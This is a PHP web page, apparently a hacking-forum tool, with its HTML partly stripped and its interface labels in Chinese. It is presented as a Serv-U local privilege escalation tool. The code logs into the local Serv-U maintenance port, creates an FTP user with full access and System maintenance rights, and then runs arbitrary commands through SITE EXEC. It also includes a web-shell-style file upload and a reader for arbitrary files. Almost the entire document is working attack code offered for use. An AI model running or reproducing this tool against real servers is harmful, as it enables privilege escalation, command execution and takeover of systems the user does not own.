Serv-U本地权限提升工具 by cfking@90sec.org

命令回显：点击进入第二步执行命令Go Execute

'."\r\n";
up($_POST['port'],$_POST['user'],$_POST['pass'],$dir,$_POST['suser'],$_POST['spass'],$_POST['sport']);
echo '

点击进入第二步执行命令Go Execute'; } if($act=='Execute'){ $path=str_replace('\\','/',$_POST['path']); echo '

命令回显：

'."\r\n";
ftpcmd($_POST['port'],$_POST['user'],$_POST['pass'],$_POST['cmd'],$path);
echo '

'; } if($_POST['subfile']){ $upfile=$_POST['p'].$_FILES['file']['name']; if(is_uploaded_file($_FILES['file']['tmp_name'])) { if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){ echo '上传失败'; }else{ setcookie('cmdpath',$upfile); echo '上传成功,路径为'.$upfile.'

'; } } } if($_POST['read']){ echo '

'."\r\n";
$inipath=str_replace('\\','/',$_POST['inipath']);
echo file_get_contents($inipath);
echo '

'; } echo '

'; function up($ftpport,$user,$password,$homedir,$suser,$spass,$sport){ $fp = fsockopen ("127.0.0.1", $sport, $errno, $errstr, 30); if (!$fp) { echo "$errstr ($errno)
\n"; } else { fputs ($fp, "USER ".$suser."\r\n"); sleep (1); fputs ($fp, "PASS ".$spass."\r\n"); sleep (1); fputs ($fp, "SITE MAINTENANCE\r\n"); sleep (1); fputs ($fp, "-SETUSERSETUP\r\n"); fputs ($fp, "-IP=0.0.0.0\r\n"); fputs ($fp, "-PortNo=".$ftpport."\r\n"); fputs ($fp, "-User=".$user."\r\n"); fputs ($fp, "-Password=".$password."\r\n"); fputs ($fp, "-HomeDir=".$homedir."\r\n"); fputs ($fp, "-LoginMesFile=\r\n"); fputs ($fp, "-Disable=0\r\n"); fputs ($fp, "-RelPaths=0\r\n"); fputs ($fp, "-NeedSecure=0\r\n"); fputs ($fp, "-HideHidden=0\r\n"); fputs ($fp, "-AlwaysAllowLogin=0\r\n"); fputs ($fp, "-ChangePassword=1\r\n"); fputs ($fp, "-QuotaEnable=0\r\n"); fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n"); fputs ($fp, "-SpeedLimitUp=-1\r\n"); fputs ($fp, "-SpeedLimitDown=-1\r\n"); fputs ($fp, "-MaxNrUsers=-1\r\n"); fputs ($fp, "-IdleTimeOut=600\r\n"); fputs ($fp, "-SessionTimeOut=-1\r\n"); fputs ($fp, "-Expire=0\r\n"); fputs ($fp, "-RatioUp=1\r\n"); fputs ($fp, "-RatioDown=1\r\n"); fputs ($fp, "-RatiosCredit=0\r\n"); fputs ($fp, "-QuotaCurrent=0\r\n"); fputs ($fp, "-QuotaMaximum=0\r\n"); fputs ($fp, "-Maintenance=System\r\n"); fputs ($fp, "-PasswordType=Regular\r\n"); fputs ($fp, "-Ratios=None\r\n"); fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n"); sleep (1); fputs ($fp, "-GETUSERSETUP\r\n"); fputs ($fp, "-IP=0.0.0.0\r\n"); fputs ($fp, "-PortNo=".$ftpport."\r\n"); fputs ($fp, " User=".$user."\r\n"); sleep (1); fputs ($fp, "QUIT\r\n"); sleep (1); while (!feof($fp)) { echo fgets ($fp,128); } fclose ($fp); } } function ftpcmd($ftpport,$user,$password,$cmd,$path){ $conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 30); if (!$conn_id) { echo "$errstr ($errno)
\n"; } else { fputs ($conn_id, "USER ".$user."\r\n"); sleep (1); fputs ($conn_id, "PASS ".$password."\r\n"); sleep (1); fputs ($conn_id, "SITE EXEC ".$path." ".$cmd."\r\n"); fputs ($conn_id, "QUIT\r\n"); sleep (1); while (!feof($conn_id)) { echo fgets ($conn_id,128); } fclose($conn_id); } } ?>

8 第一步：添加FTP用户
用户名：
密码：
端　口：
USER ：
PASS ：
PORT ：
路径：

8 第二步：执行命令
USER ：	'>
PASS ：	'>
PORT ：	'>
CMDPATH ：	' size='55'>
Command ：

当前路径: